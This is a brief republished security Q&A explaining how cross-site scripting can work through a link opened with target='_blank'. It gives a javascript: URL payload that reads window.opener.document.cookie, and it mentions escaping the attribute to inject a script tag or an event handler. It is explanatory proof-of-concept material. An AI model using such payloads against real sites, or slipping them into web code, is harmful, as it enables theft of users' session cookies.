Menu
Newbedev LogoNEWBEDEV Python Javascript Linux Cheat sheet
Newbedev LogoNEWBEDEV
  • Python 1
  • Javascript
  • Linux
  • Cheat sheet
  • Contact

XSS with <a> tag with target="_blank`

You can use window.opener to exploit this (fiddle):

<a target="_blank" href="javascript:alert(window.opener.document.cookie);">test</a>

Or if you can escape the attribute value context, you can start a new script tag or a new attribute like onMouseEnter.

Tags:

Xss

Web Application

Related

Stolen MacBook: should I worry about my data? Pen test results for web application include a file from a forbidden directory that is not even used or referenced Is this password scheme legit? How are Mozilla Firefox passwords encrypted? Why does Windows store Wi-Fi passwords in a reversible format? The teacher logged me in as administrator for doing a short task, is the whole system now compromised? How to decide whether an eshop is safe or compromised How to avoid using System.String with Rfc2898DeriveBytes in C# What are the differences between Burp and OWASP ZAP? Trying to understand how Digital Certificates and CA are indeed secure Can I blindly trust 127.0.0.1? Running code generated in realtime in JavaScript with eval()

Recent Posts

Pandas how to find column contains a certain value Recommended way to install multiple Python versions on Ubuntu 20.04 Build super fast web scraper with Python x100 than BeautifulSoup How to convert a SQL query result to a Pandas DataFrame in Python How to write a Pandas DataFrame to a .csv file in Python
© 2021 newbedevPrivacy Policy